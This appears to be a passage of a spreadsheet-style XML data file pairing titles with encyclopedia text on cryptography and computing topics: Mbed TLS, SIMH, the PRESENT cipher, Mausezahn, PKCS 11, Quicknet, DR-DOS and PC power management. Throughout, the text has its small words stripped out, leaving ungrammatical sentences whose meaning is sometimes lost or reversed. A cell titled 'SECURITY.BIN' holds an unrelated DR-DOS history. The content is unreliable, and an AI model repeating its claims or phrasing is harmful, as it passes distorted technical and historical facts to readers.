jahrhundert/ collection, laboratory, theater, berlin; walter gruyter publishers. vendor: aegis technologies: battlestorm simulator simnet insider's perspective, neal cosby simnet: advent simulator networking, duncan miller jack thorpe virtual hell, wired magazine issue 1.01, bruce sterling lockheed martin's close combat tactical trainer (cctt) defense advanced research projects agency (darpa) technology transition, pages</t>
  </si>
  <si>
    <t>Mbed TLS</t>
  </si>
  <si>
    <t>mbed (previously polarssl) implementation protocols respective cryptographic algorithms support code required. distributed apache license version 2.0. stated website mbed aims "easy understand, use, integrate expand". history polarssl library official continuation fork xyssl library. xyssl created french "white hacker" christophe devine first released november 2006, licenses. 2008, christophe devine longer able support xyssl allowed paul bakker create official fork, named polarssl. november 2014, polarssl acquired holdings.in 2011, dutch government approved integration openvpn polarssl, named openvpn-nl. this version openvpn approved protecting government communications level restricted.as release version 1.3.10, polarssl rebranded mbed better show inside mbed ecosystem. starting version 2.1.0, library made available apache license v2.0.since version 2.17, mbed solely licensed apache license version 2.0.in 2020, mbed joined trustedfirmware project. library core library written programming language implements module, basic cryptographic functions provides various utility functions. unlike openssl implementations tls, mbed like wolfssl designed small embedded devices, minimum complete stack requiring 60kb program space ram. also highly modular: component, cryptographic function, used independently rest framework. versions also available microsoft windows linux. because mbed written programming language, without external dependencies, works operating systems architectures. later versions polarssl 1.3.0, abstraction layers memory allocation threading core support better integration existing embedded operating systems". design priorities mbed library expresses focus readability code, documentation, automated regression tests, loosely coupled design portable code. development documentation following documentation available developers: high level design: high level description different modules inside library, diagrams, cases interactions common scenarios. documentation: doxygen-generated documentation header files library. source code documentation: source code library documented clarify structures, decisions code constructs. automated testing automated testing mbed includes: test framework included source code contains 5000 automated tests (based number tests version 1.3.2 library) test regressions compatibility different platforms. compatibility script (compat.sh) tests compatibility communication openssl gnutls. continuous integration system based travis jenkins. mbed used component large open source projects: openvpn openvpn-nl hiawatha powerdns monkey http server platforms mbed currently available operating systems including linux, microsoft windows, openwrt, android, ios, risc freertos. chipsets supported least include arm, x86, powerpc, mips. algorithms mbed supports number different cryptographic algorithms: cryptographic hash functions md2, md4, md5, ripemd160, sha-1, sha-2 modes cmac, hmac ciphers aes, aria, blowfish, camellia, chacha, des, rc4, triple des, xtea cipher modes ecb, cbc, cfb, ctr, ofb, authenticated encryption modes ccm, gcm, nist wrap, chacha20-poly1305 derivation hkdf stretching pbkdf2, pkcs pbe2, pkcs derivation public-key cryptography rsa, diffie–hellman exchange, elliptic curve cryptography (ecc), elliptic curve diffie–hellman (ecdh), elliptic curve (ecdsa), elliptic curve j-pake also transport layer security comparison implementations posse project gnutls network security services wolfssl (previously cyassl) matrixssl openssl references external links official website</t>
  </si>
  <si>
    <t>SIMH</t>
  </si>
  <si>
    <t>simh free open source, multi-platform multi-system emulator. maintained supnik, former engineer vice president, development form another since 1960s. history simh based much older systems emulator called mimic, written late 1960s applied data research. simh started 1993 purpose preserving minicomputer hardware software fading obscurity.in 2022, license simh version github unilaterally modified contributor make non-free, adding clause revokes right subsequent revisions software containing contributions modifications "influence behaviour disk access activities" made. 2022, supnik longer endorses version official website simh changes, recognizing "classic" version releases.on june 2022, last revision simh subject clause (licensed licenses license) forked group open simh, governance model steering group includes supnik others. open simh group cited "situation" arisen project compromised principles. emulated hardware simh emulates hardware following companies. advanced computer design pdq-3 at&amp;t besm besm-6 burroughs b5500 control data corporation 1700 data general nova eclipse digital equipment corporation alpha pdp-1 pdp-4 pdp-7 pdp-8 pdp-9 pdp-10 pdp-11 pdp-15 family systems microvax vaxstation microvax vaxstation microvax 3900 11/730 11/750 11/780 8600 corporation gri-909 hewlett-packard 2116 2100 21mx 3000 honeywell h316 h516 hobbyist projects n8vem 1401 1620 1130 7010 7070 7080 7090/7094 system/3 intel intel systems 8010 8020 interdata 16-bit series 32-bit series lincoln labs research tx-0 manchester university baby, ssem mits altair 8800 intel 8080 zilog versions royal-mcbee lgp-30 lgp-21 sage computer technology sage scientific data systems swtpc swtpc 6800 xerox data systems sigma references external links official website open simh github additional vax/microvax models simh running vax/vms under linux using simh debian package freebsd port unix: school. using simh explore unix history matthew hoskins</t>
  </si>
  <si>
    <t>PRESENT</t>
  </si>
  <si>
    <t>present lightweight block cipher, developed orange labs (france), ruhr university bochum (germany) technical university denmark 2007. present designed andrey bogdanov, lars knudsen, gregor leander, christof paar, axel poschmann, matthew robshaw, yannick seurin, vikkelsoe. algorithm notable compact size (about times smaller aes). overview block size bits size bit. non-linear layer based single 4-bit s-box designed hardware optimizations mind. present intended used situations low-power consumption high chip efficiency desired. international organization standardization international electrotechnical commission included present international standard lightweight cryptographic methods. cryptanalysis truncated differential attack rounds present suggested 2014.several full-round attacks using biclique cryptanalysis introduced present.by design block ciphers block size problems block collisions used large amounts data. therefore, implementations need make sure amount data encrypted limited rekeying properly implemented. performance present uses bit-oriented permutations software-friendly. clearly targeted hardware, bit-permutations possible simple wiring. performance present evaluated microcontroller software environment using felics (fair evaluation lightweight cryptographic systems), benchmarking framework evaluation software implementations lightweight cryptographic primitives. standardization present included following standards. iso/iec 29167-11:2014, information technology automatic identification data capture techniques part crypto suite present-80 security services interface communications iso/iec 29192-2:2019, information security lightweight cryptography part block ciphers references external links present: ultra-lightweight block cipher http://www.lightweightcrypto.org/implementations.php software implementations python https://web.archive.org/web/20160809024354/http://cis.sjtu.edu.cn/index.php/software_implementation_of_block_cipher_present_for_8-bit_platforms implementation http://www.emsec.rub.de/media/crypto/veroeffentlichungen/2011/01/29/present_ches2007_slides.pdf talk slides cryptographic hardware embedded systems</t>
  </si>
  <si>
    <t>SIMD (hash function)</t>
  </si>
  <si>
    <t>simd cryptographic hash function based merkle–damgård construction submitted nist hash function competition gaëtan leurent. fourteen entries accepted round competition, shortlisted third final round.the designer states "most important component simd message expansion, designed give high minimal distance". algorithm's speed claimed 11-13 cycles byte. references</t>
  </si>
  <si>
    <t>Mausezahn</t>
  </si>
  <si>
    <t>mausezahn (german pronunciation: [ˈmaʊ̯zəˌʦaːn], german "mouse tooth") fast network traffic generator written allows user craft nearly every possible "impossible" packet. since version 0.31 mausezahn open source terms gplv2. herbert haas, original developer mausezahn, died june 2011. project incorporated netsniff-ng toolkit, continues developed there.typical applications mausezahn include: testing stressing multicast networks penetration testing firewalls finding weaknesses network software appliances creation malformed packets verify whether system processes given protocol correctly didactical demonstrations utilitymausezahn allows sending arbitrary sequence bytes directly network interface card. integrated packet builder provides simple command line interface complicated packets. since version 0.38, mausezahn offers multi-threaded mode cisco-style command line interface. features version 0.38 mausezahn supports following features: jitter measurement real-time transport protocol (rtp) packets vlan tagging (arbitrary number tags) mpls label stacks (arbitrary number labels) bpdu packets used spanning tree protocol (pvst+ also supported) cisco discovery protocol messages link layer discovery protocol messages igmp version query report messages messages messages udp, header creation icmp packets syslog messages address, port, sequence number sweeps random addresses, fqdn addresses high packet transmission rate (approximately 100,000 packets second)mausezahn sends exactly packet user specified. therefore, rather less suited vulnerability audits additional algorithms required detect open ports behind firewall automatically evade intrusion detection systems (ids). however, network administrator could implement audit routines script utilizes mausezahn creating actual packets. platforms mausezahn currently runs linux systems plans port windows operating system. also traffic generation model nessus nmap references external links original website wayback machine (archived 2017-03-24) official/new website</t>
  </si>
  <si>
    <t>PKCS 11</t>
  </si>
  <si>
    <t>cryptography, pkcs public-key cryptography standards, also refers programming interface create manipulate cryptographic tokens token secret cryptographic key). detail pkcs standard defines platform-independent cryptographic tokens, hardware security modules (hsm) smart cards, names "cryptoki" (from "cryptographic token interface" pronounced "crypto-key", although "pkcs #11" often used refer well standard defines it). defines commonly used cryptographic object types (rsa keys, x.509 certificates, des/triple keys, etc.) functions needed use, create/generate, modify delete objects. usage most commercial certificate authority (ca) software uses pkcs access signing enroll user certificates. cross-platform software needs smart cards uses pkcs #11, mozilla firefox openssl (using extension). also used access smart cards hsms. software written microsoft windows platform specific ms-capi instead. both oracle solaris enterprise linux contain implementations applications, well. relationship kmip management interoperability protocol (kmip) defines wire protocol similar functionality pkcs#11 api. standards originally developed independently governed oasis technical committee. stated objective pkcs#11 kmip committees align standards practicable. example, pkcs#11 sensitive extractable attributes added kmip version 1.4. there considerable overlap members technical committees. history pkcs#11 standard originated security along pkcs standards 1994. 2013, contributed latest draft revision standard (pkcs#11 2.30) oasis continue work standard within newly created oasis pkcs11 technical committee. following list contains significant revision information: 01/1994: project launched 04/1995: v1.0 published 12/1997: v2.01 published 12/1999: v2.10 published 01/2001: v2.11 published 06/2004: v2.20 published 12/2005: amendments (one-time password tokens, ct-kip 01/2007: amendment (additional mechanisms) 09/2009: v2.30 draft published review, final version never published 12/2012: announce pkcs management transitioned oasis 03/2013: oasis pkcs technical committee inaugural meetings, works starts v2.40 04/2015: oasis pkcs v2.40 specifications become approved oasis standards 05/2016: oasis pkcs v2.40 errata specifications become approved oasis errata 07/2020: oasis pkcs v3.0 specifications become approved oasis standards also list applications using pkcs microsoft cryptoapi references external links 7512 pkcs scheme pkcs#11: cryptographic token interface standard oasis pkcs technical committee home page</t>
  </si>
  <si>
    <t>Quicknet</t>
  </si>
  <si>
    <t>quicknet ajax framework (using xmlhttprequest javascript) designed develop applications websites passwords identify correct users. using framework, cleartext password would sent network stored server. quicknet supports multi-language, javascript cooperative multitasking, ajax call, session password management, modular structure, content, javascript animation. uses server side, javascript client side. system requirements server-side quicknet server apache 2.2+, mysql 5.1+ client-side quicknet compatible internet explorer firefox opera safari google chrome session password management quicknet ajax framework aims protect users’ passwords specially designed algorithm. this achieved using cryptographic hash function javascript code client-side, well code server-side, generate compare hash results based users’ passwords random data. however, cleartext password would sent network stored server. believed impossible steal session discover user's original password, even data sent network and/or stored server known. secure data transmission currently, quicknet possibly ajax framework provides secure data transmission without ssl. multi-language currently, quicknet possibly ajax framework built-in support multi-language. developers could easily language build systems. also ajax framework external links official website</t>
  </si>
  <si>
    <t>SECURITY.BIN</t>
  </si>
  <si>
    <t>dr-dos (written dos, without hyphen, versions including 6.0) disk operating system compatibles. upon introduction 1988, first attempting compatible ms-dos (which product sold different names). dr-dos developed gary kildall's digital research derived concurrent 6.0, advanced successor cp/m-86. ownership changed, various later versions produced names including novell caldera opendos. history origins cp/m digital research's original cp/m 8-bit intel 8080- z-80-based systems spawned numerous spin-off versions, notably cp/m-86 intel 8086/8088 family processors. although cp/m dominated market since mid-1970s, shipped vast majority non-proprietary-architecture personal computers, 1981 brought beginning eventually massive change. originally approached digital research 1980, seeking version cp/m. however, disagreements contract, withdrew. instead, deal struck microsoft, purchased another operating system, 86-dos, seattle computer products (scp). this became microsoft ms-dos dos. 86-dos's command structure application programming interface imitated cp/m (with bdos 2.2). digital research threatened legal action, claiming dos/ms-dos similar cp/m. early 1982, settled agreeing sell digital research's version cp/m, cp/m-86, alongside dos. however, sold us$40 cp/m-86 $240 price tag. proportion buyers prepared spend times much cp/m-86 small, limited availability compatible application software, first digital research's favor, temporary.digital research fought long losing battle promote cp/m-86 multi-tasking multi-user successors mp/m-86 concurrent cp/m-86, eventually decided could beat microsoft-ibm lead application software availability, modified concurrent cp/m-86 allow applications ms-dos dos. this shown publicly december 1983 shipped march 1984 concurrent (a.k.a. cdos bdos 3.1) hardware vendors. while concurrent continued evolve various flavours years eventually become multiuser real/32, specifically tailored desktop market expensive single-user applications. therefore, time attempts made sideline product: 1985, digital research developed plus 2.1, stripped-down modified single-user derivative concurrent 5.0, applications platforms, allowed switching several tasks original cp/m-86. compatibility limited, digital research made another attempt, time native system. this disk operating system launched 1988 dos. although based pacific grove later monterey, california, usa, work plus started newbury, berkshire digital research europe support group located since 1983. beginning 1986, operating system work concurrent multiuser dos, palmdos done digital research's european development centre (edc) hungerford, berkshire. later work also done digital research gmbh munich, germany. first version requested several oems, digital research started plan develop operating system addressing defects left ms-dos 1987. particular importance million dollar deal kazuhiko "kay" nishi ascii corporation, previously instrumental opening japanese market microsoft. first version released 1988. version numbers chosen reflect features relative ms-dos; first version promoted public 3.31, offered features comparable compaq ms-dos 3.31 large disk support (fat16b a.k.a. "bigdos"). 3.31 reported "ibm 3.31", internal bdos (basic disk operating system) kernel version reported 6.0, single-user nature, reflecting origin derivative concurrent multitasking multiuser capabilities well cp/m support stripped xios replaced ibm-compatible dos-bios. system files named drbios.sys (for dos-bios) drbdos.sys (for bdos kernel), disk label used "digital␠". offered extended command line tools command line help, verbose error messages, sophisticated command line history editing (history directive) well support file directory passwords built right kernel. also cheaper license ms-dos, romable right start. romed version also named (rom operating system). approached number manufacturers interested third-party dos, prompted several updates system. time, ms-dos available oems bundled hardware. consequently, achieved immediate success became possible consumers normal retail channels beginning version 3.4x. known versions 3.31 (bdos 6.0, june 1988, only), 3.32 (bdos 6.0, august 1988, only), 3.33 (bdos 6.0, september 1988, only), 3.34 (bdos 6.0, only), 3.35 (bdos 6.0, october 1988, only), 3.40 (bdos 6.0, january 1989), 3.41 (bdos 6.3, june 1989, retail). like ms-dos, produced several variants different hardware. while oems kept name designation, 2001 sales, inc. marketed name ez-dos 3.41 (also known ez-dos 4.1). version (code-named "leopard") released 1990, still reporting 3.31" compatibility purposes, internally indicating single-user bdos kernel. (version skipped avoid associated relatively unpopular ms-dos 4.0.) this introduced viewmax, gem-based file management shell. viewmax's startup screen would present slogan "digital research make computers work". also introduced patented batterymax power management system, bundled disk-caching software (drcache), remote file transfer tool (filelink), cursor shape configuration utility (cursor), offered vastly improved memory management system (memorymax). compatibility purposes, system files named ibmbio.com (for dos-bios) ibmdos.com (for bdos kernel) advanced loader boot sector could physically stored anywhere disk. label boot sectors changed "ibm␠␠3.3". first include load-high capabilities. kernel data structures disk buffers could relocated high memory area (hma), first extended memory accessible real mode. this freed equivalent amount critical "base" conventional memory, first pc's area applications run.additionally, intel 80386 machines, dos's memory manager allowed operating system load device drivers upper memory blocks, freeing base memory. first integrate functionality base (loading device drivers upper memory blocks already possible using third-party software like qemm). this allowed systems supported chipsets systems, provide significantly free conventional memory dos. once drivers mouse, multimedia hardware network stack loaded, ms-dos/pc machine typically might free conventional memory little much late-1980s software. contrast this, 5.0, little manual tweaking, could load still keep conventional memory free allowing necessary data structures, much with memmax conventional memory region could even extended unused portions graphics adapter card typically providing another free memory. because left much conventional memory available, programs utilizing certain address wrapping techniques failed properly loaded unexpectedly (or, ms-dos, "impossibly") memory inside first segment (known "low memory"). therefore, 5.0's memmax command worked around pre-allocating chunk memory start memory order programs load barrier (but less usable conventional memory then). default, memmax configured applications could take advantage extra memory. competition microsoft faced substantial competition arena, microsoft responded announcement yet-to-be released ms-dos 1990. this would released june 1991 include similar advanced features dos. included matches dr's enhancements memory management.almost immediately september 1991, digital research responded 6.0, code-named "buxton". 6.0, already bdos level internally, would still report "ibm 3.31" normal applications compatibility purposes. this bundled superstor on-the-fly disk compression, maximize available hard disk space, file deletion tracking undelete functionality roger gross. also included task-switcher named taskmax support industry-standard task-switching multiple applications time. contrast digital research's multiuser (successor concurrent multi-user products line), would applications pre-emptively multitasked virtual machines, task switcher would freeze background applications brought back foreground. while x86-machines, able swap memory 286+ machines. taskmax support copy paste facility applications. task-switcher api, graphical user interfaces viewmax pc/geos could register task manager menu thereby replace taskmax text mode menu, users could switch tasks within gui. microsoft responded ms-dos 6.0, matched features 6.0. december 1991, pre-release version windows found return non-fatal error message detected non-microsoft dos. this check came known aard code. simple matter digital research patch circumvent aard code 'authenticity check' windows beta rearranging order internal tables memory (with changes functionality), patched version, named "business update", streets within weeks release windows 3.1. with detection code disabled, windows perfectly successor novell dos. code present disabled released version windows 3.1.in july 1992, digital research japan released 6.0/v, japanese dos/v compatible version 6.0. korean version appears available well. palmdos 1992 digital research, still name already bought novell july 1991, also embarked spin-off product code-named "merlin" later released netware palmdos which, name implies, resource-light derivative aimed emerging palmtop/pda market.palmdos first operating system family support bdos kernel native compatible internal data structures instead emulations thereof. replacing emulation cp/m kernel true compatible kernel helped improving compatibility applications using dos' internal data structures also reducing resident size kernel code even further—a particular requirement market. hand, introducing genuine current directory structure (cds) imposed limit depth working directories characters ms-dos/pc dos), whereas previous issues limitation internal organization directories relative links parent directories instead absolute paths. palmdos still reported 3.31" applications order keep kernel small compatibility problems windows, would expect dosmgr implemented version since 5.0. well rom-executing kernel, palmdos palmtop-type support features pcmcia cards (with dpms support), power management (batterymax [[$idle$]] device driver patented dynamic idle detection gross john constant), minimax task switcher support (personal information modules) applications stored executed (execute-in-place), etc. pcmcia stack palmdos partially written cullimore. novell contribution novell novell novell corporation's name period novell sold dos, acquisition digital research 1991. regarding features performance, typically least release ahead ms-dos. 1993, 6.1, ms-dos trumped novell's 7.novell robert frankenberg's strategy included "major trimming", selling products like transactional database btrieve killing others novell wordperfect's multimedia main street children's titles. novell licensed technology stac electronics novell network operating system, netware. novell sold product line caldera july 1996, approached novell looking operating system bundle openlinux distribution.marc perkel claimed inspired novell february 1991 digital research develop something envisioned "novos". novell actually bought digital research july 1991 view using dr's product line lever comprehensive strategy break microsoft monopoly. (this part massive ultimately disastrous spending spree novell: bought wordperfect corporation time, borland's products, invested heavily unix well.) planned 7.0", internally named "panther", intended trump microsoft's troubled ms-dos 6.0, repeatedly delayed, novell working optionally loadable unix-like multi-user security extension (with, loaded, file commands like backup, delpurge, move, touch, tree, undelete, xattrib, xcopy, xdel xdir supporting otherwise disabled /u:name command line option select specific users groups, compatible multiuser dos) graphical user interfaces (viewmax derivative gem, "star trek", true port apple's system multitasker named "vladivar"). when eventually arrived december 1993 (with localized versions released march 1994), renamed novell (a.k.a. "nwdos"), without three components, disappointment some. larger lacked finishing touches, nevertheless seen best many industry experts.in germany, novell aggressively marketed slogan "trau keinem unter (don't trust press free demo floppies computer magazines. campaign aimed market resulted million copies sold february 1994 3000 dealers interested carry product. novell available various oems, dedicated mail order shop authorized dealers.a major functional addition novell's second attempt peer-to-peer networking system, personal netware (pnw). this better predecessor, netware lite (nwl), incompatible microsoft's networking system, growing popular support windows workgroups, os/2, windows considerable amount manual configuration needed co-exist personal netware never achieved much success. since novell implemented dosmgr internal data structures updated, bdos kernel could report version "ibm" without risking compatibility problems windows. most tools would report 6.1", also reported applications. novell introduced much advanced memory management including support dpmi (dos protected mode interface) dpms (dos protected mode services) well flexible loadhigh options. also introduced support "true" pre-emptive multitasking multiple applications virtual machines (vdm), component originally named multimax. this similar multiuser dos, basis natively compatible environment, similar windows enhanced mode, without gui. default, bundled taskmgr would behave similar former taskmax. however, emm386 loaded option /multi, emm386 would load natively 32-bit protected mode operating system core providing support pre-emptive multitasking, multi-threading, hardware virtualization domain management virtual machines. this could used dos-aware applications. taskmgr later would instance current 16-bit system environment, create virtual machines applications instead using real mode task-switcher support. multitasker compatible windows, tasks started launching windows could seen tasks windows well. novell personal netware also shipped netwars, network-enabled arcade game. novell personal netware required several bug-fix releases (d70xyy x=language, yy=number) completely stable next development occurred. with beta versions microsoft's "chicago" (what would later become windows sight, novell wound development novell september 1994 stopped maintenance january 1996 updates. after novell when caldera approached novell looking operating system bundle openlinux distribution, novell sold product line caldera july 1996, time little commercial value them. between caldera-owned dr-dos competition ibm's 6.3, microsoft moved make impossible subsequent windows version, windows product own. claimed purely technical change, later subject major lawsuit brought salt lake city caldera help canopy group. microsoft lawyers tried repeatedly case dismissed without success. immediately completion pre-trial deposition stage (where parties list evidence intend present), out-of-court settlement january 2000 undisclosed sum. this revealed november 2009 $280 million.in august 1996, us-based caldera, inc. approached roger gross, original dr-dos engineers, proposal restart dr-dos development make windows dr-dos would help court case. following meeting september 1996 lindon, utah, usa, gross, ransom love, bryan wayne sparks raymond john noorda, gross hired tasked subsidiary september 1996, caldera announced coming release opendos (cod) intent also release source code system, caldera ltd. incorporated september 1996. gross hired original developers operating system novell well talents continue work operating system converted barn periphery andover, hampshire, nearby former digital research novell edc. besides improvements enhancements system, string features added subsequently course next years, including tcp/ip stack (derived workplace netware mobile), graphical 32-bit protected mode html web-browser dr-webspyder (originally based source code arachne browser michal polák) modem dialup, posix pthreads extension multi-tasker andy wightman, long filename (longname) support edward hill, jr., well fat32 support (drfat32) matthias paul. gross also hired andrew schulman (who been, geoff chappell, instrumental identifying aard code 1992) work consultant and, andover, assist paul work "winglue", secret project create version dr-dos compatible windows replace ms-dos 7.xx component. this demonstrated cebit march 1998, later, small team, developed "winbolt", versions dr-dos, remained unreleased 2018, played important role court case.caldera officially released caldera opendos 7.01 february 1997, version novell update december 1994) compiled necessary adaptations incorporate name display messages well environment variables file names. missing year's worth patches developed novell updates (january 1995) 15.2 (january 1996). this parts novell sources lost novell meanwhile. consequently, version still reported internal bdos version 7.2, identical novell suite also lacked setfifo command, added novell updates, well fifth generation's search&amp;destroy virus scanner fastback plus utility, previously came bundled novell dos. instead came bundled newer version pnunpack brought much advanced version netwars.parts opendos 7.01 released open source form m.r.s. (for machine readable sources) 1997, license terms mostly incompatible existing open-source licenses. source closed gross felt would undermine commercial aspirations system. after beta releases september november 1997, next official release came december 1997, name changed caldera dr-opendos 7.02, soon followed release march 1998, dr-dos name returned caldera dr-dos 7.02, first time written hyphen. version 7.02 (now reporting bdos 7.3) incorporated improved bios bdos issues, developed paul, adding many boot configuration options, integrating many compatibility enhancements, bug-fixes optimizations size speed, re-implementing fixes missing novell updates. bios improved coexistence dr-dos windows support third-party disk compression drivers microsoft's drivespace. introduced diagnostics mode (activated scroll lock), integrated debugger support (with debug=on debugger loaded within config.sys) flexible config.sys tracing capabilities f5/f6/f7/f8 hotkeys trace timeout commands, thereby also improving integration alternative command line shells 4dos. together loader, /dr:ext chain directive, brought enhanced multi-configuration support dr/d/config.ext files came enhancements basic-like config.sys language powerful boot menus, convenient user interaction programmatical acting upon conditions (cpu386), return codes error levels (error, onerror). also allowed change scrollock, capslock, insert verify settings well switchar, yeschar, nochar resumechar characters. various behavioural details could controlled parameters (quiet), (lowercase), (yes) (switch) switches. further, provided optional support lpt4: device allowed configure built-in comx: lptx: devices well change prn: aux: defaults. handling environment variables config.sys improved load-high facilities included hifiles/fileshigh hifcbs/fcbshigh options relocate file handles structures umbs, typically gave (and free conventional memory compared previous versions, hishell/shellhigh size directive control pre-allocation memory command.com, helped avoid memory fragmentation thereby typically gave continuous memory hma-capable third-party drivers work conjunction third-party command line shells, could load command.com option. reduced memory footprint version 7.02 also brought enhanced 4.xx sub-system paul allow multiple, distributed possibly user-configured country.sys files used system time hierarchical model. this also gave dynamic parser support ms-dos/pc country.sys file formats addition dr-dos' country.sys formats, introduced support 8601 international date format (including automatic detection) then-new euro currency. some dr-dos files ibmbio.com, ibmdos.com country.sys carried misleading file extensions compatibility reasons; dr-dos 7.02 enhanced incorporate binary-style safety feature devised paul would exit gracefully called inappropriately. dr-dos 7.02 fully year 2000 compliant provided special support work buggy system bioses. also came updated fdisk, could partition format fat32 volumes (but work lba). sources novell patches external tools drivers meanwhile found germany could thus retro-fitted system well, dr-dos 7.02 finally caught novell true step forward. release followed various updates june, august september 1998. updated internal bdos version number introduced problem: legacy third-party applications special support novell dos, longer updated, stopped working. setver already allowed novell disguise versions file name globally and, specifying magic sub-version 255, would even disable internal bdos version check order cope programs specifically probing "dr-dos". modified kernel setver driver paul would, hierarchical model, also support load paths order distinguish multiple executables file name, introduced extended mode, setver could fake versions, also bdos kernel versions. sub-versions would reported sub-versions applications, bdos version check disabled, sub-versions could used fake different bdos versions, whereas revision number (typically static, pre-boot patchable data structure) would taken reported sub-version instead, setver 6.114 would allow versions dr-dos since 7.02 still report "dos 6.0" faked bdos version (114 decimal hexadecimal), thereby masquerading novell opendos 7.01.while otherwise beneficial, hifiles triggered compatibility problem dos-up feature third-party memory manager qemm hard-wired expect chunk five handle structures conventional memory dr-dos previous versions 7.01), whereas version 7.02 design left eight handles memory loading high files order maintain full compatibility older versions windows 3.xx. compatibility windows workgroups 3.11 affected this. maintenance devised patch single byte ibmbio.com order switch behaviour optionally re-invoke chunking. this freed bytes conventional memory enabled full compatibility dos-up, time broke compatibility older versions windows 3.xx using hifiles feature, vice versa. patch named ibmbio85.scr continued work newer versions dr-dos.in august 1998 us-based caldera, inc. created subsidiaries, caldera systems, inc. linux business, caldera thin clients, inc. embedded thin-client market.another version, dr-dos 7.03 (still bdos reporting applications 6.0" compatibility purposes), pre-released christmas 1998 officially released january 1999 caldera came significantly improved memory managers particular enhanced dpmi support conjunction multitasker) enhancements, added devload drmouse utilities, changed label boot sector volumes formatted dr-dos could also cause problems operating systems (which circumvented novoltrk). dr-dos 7.03 would become last version dr-dos also tailored desktop use. caldera, inc. wanted relocate dr-dos business closed highly successful operation february 1999 gross resigned icentrix develop marionet split browser. development moved (which never worked total lack expertise field caldera us), dr-dos line fell branch company, caldera thin clients, renamed lineo, inc. july 1999. dr-webspyder renamed embrowser said ported linux. lineo re-released dr-dos 7.03 june september 1999, still branded "caldera dr-dos" without changes, otherwise focussed linux embedded systems, based stripped-down version openlinux named embedix.among latest independently developed versions dr-dos dr-dos 7.04 august 1999) 7.05 november 1999), still branded "caldera dr-dos". these variants system consisting kernel command shell. with specialized native implementation fat32 large hard disk support could found bundled ontrack's easy recovery 2000, replacing dynamically-loadable drfat32 redirector driver, still came easy recovery they also used seagate technology's seatools imaging software nero burning rom. while still reporting bdos internally, first versions report 7.10" applications order indicate integrated fat32 support. designed mostly backwards-compatible, dr-dos 7.04/7.05 ibmbio.com could combined dr-dos 7.03 ibmdos.com order give desktop-approved dr-dos 7.03 kernel capabilities work drives larger specific requirements, dr-dos 7.06 december 1999) wightman combined kernel files single binary executable, that, similar io.sys windows could booted ms-dos 7.10 boot sectors (but longer dr-dos boot sectors). dr-dos 7.07 (with bdos 7.4/7.7) paul introduced bootstrap loaders updated disk tools order combine support disk access, fat12, fat16 fat32 file systems, differing bootstrapping conventions dr-dos, dos, ms-dos, windows, real/32 loader single newldr boot sector, code would continue load version dr-dos 3.31 (and since dr-dos 7.04 also fat32 support), could also used launch ms-dos system files, including windows 7.10. time kernel could booted sectors, also previously dr-dos formatted disks, well disks existing ms-dos boot sectors variety boot-loaders, thereby easing coexistence setup multi-boot scenarios conjunction operating systems. later versions 2002, lineo bought out, lineo's former managers purchased name formed company, drdos, inc. devicelogics l.l.c. they continued sell dr-dos embedded systems. dr-dos released march 2004 featuring fat32 large disk support, ability boot flash, multitasking dpmi memory manager. this version based kernel version 7.03.the company later released dr-dos (with better fat32 support) autumn 2005. this version instead based opendos 7.01.xx. dr-dos withdrawn violations (see controversies). aside selling copies operating system, drdos, inc. website lists buyout option dr-dos; asking price us$25000.the opendos 7.01 source code base dr-dos/opendos enhancement project, july 2002 attempt bring functionality dr-dos parity modern non-windows operating systems. project's added native support large disks (lba) fat32 file system, several enhancements, including improved memory management support fat32+ file system extension allows files size normal partitions. dr-dos 7.01.08 released july 2011. controversies october 2005, discovered dr-dos included several utilities freedos well sources, kernel outdated version enhanced dr-dos kernel. dos, inc. failed comply general public license (gpl) crediting freedos utilities authors including source code. after complaints freedos developers (including suggestion provide source code, hence comply gpl), dos, inc. instead withdrew version 8.1, also unaffected 8.0, website. commands append, assign, batch, dbg, delq, era, eraq, more subst among internal commands supported since 3.31. removed batch added hiload. gosub, idle, return switch added internal commands 6.0. assign subst changed become external commands 6.0. echoerr pauseerr existed internal commands (and multiuser dos), normally enabled. more remained internal command including palmdos, changed external command novell removed novell loadhigh, truename added internal commands. append still internal command 6.0, changed external command novell internal commands following list internal commands supported 6.0: batch processing subcommands batch processing subcommands include: external commands supports following external commands: also cp/m mp/m plus multiuser netware marionet split browser comparison operating systems timeline operating systems aard code general software embedded bios notes references further reading digital research, inc. (1990). retail lid. digital research, inc. part number 1176-6114-001. digital research, inc. (may 1990). user guide ed.). digital research, inc. part number 1176-2004-002. (501 pages) digital research, inc. (may 1990). viewmax user guide ed.). digital research, inc. part number: 1174-2004-002. pages) digital research, inc. (august 1990). release notes. digital research, inc. part number: 1176-1001-002. pages) digital research, inc. (august 1991). software performance report. digital research, inc. part 000-1200-00. fold) digital research, inc. (august 1991). user guide ed.). digital research, inc. part number. 1182-2004-002. (698 pages) digital research, inc. (august 1991). viewmax user guide ed.). digital research, inc. part number. 1192-2054-002. (106 pages) novell desktop systems group (1993-01-07) [1992]. "drtips.zip". digital research novell. archived original 2018-09-12. retrieved 2018-04-03. external links official website (archived snapshot 2018-07-05) enhanced dr-dos/opendos project dr-dos online manual dr-dos wiki</t>
  </si>
  <si>
    <t>PC power management</t>
  </si>
  <si>
    <t>power management refers software-based mechanisms controlling power personal computer hardware. this typically achieved software puts hardware lowest power demand state available, making aspect green computing. typical office uses watts active (approximately watts base unit, watts typical screen); three four watts ‘asleep’. modern office’s electricity demand monitors.while allow power settings, frequently situations, especially networked environment, processes running computer prevent power settings taking effect. this dramatic effect energy invisible user. operational testing shown given average organisation's computers fail sleep, long periods time affects machines. this leads computers option customizing power management systems created market third-party power management software control computer’s power use. windows 'insomnia' (sleepless pcs) windows power management system based upon idle timer. computer idle longer pre-set time, configured sleep 'hibernate'. windows uses combination user activity activity determine computer idle. applications temporarily inhibit timer using 'setthreadexecutionstate' api. there legitimate reasons necessary burning playing video. however, many cases applications unnecessarily prevent power management working. this commonly known windows 'insomnia' significant barrier successfully implementing power management. common causes so-called 'insomnia' include: legacy non-power management aware applications open file handles remote computers faulty mice cause cursor movement even though user present. (this makes operating system believe user present.) scheduled maintenance tasks causing significant activity high network activity software solutions operating systems built-in settings control power use. microsoft windows supports predefined power plans custom sleep hibernation settings control panel power options applet. apple's macos includes idle sleep configuration settings energy saver system preferences applet. likewise, linux distributions include variety power management settings tools.there significant market third-party power management software offering features beyond present windows operating system. notable vendors include 1e's 'nightwatchman', data synergy's 'powerman', faronics' 'power save', verdiem's 'surveyor'. enviprot's 'auto shutdown manager'some studies suggested power management tools save average emissions year generate year energy savings. this makes power management software attractive option large companies. also energy management advanced configuration power interface references</t>
  </si>
  <si>
    <t>Merge (software)</t>
  </si>
  <si>
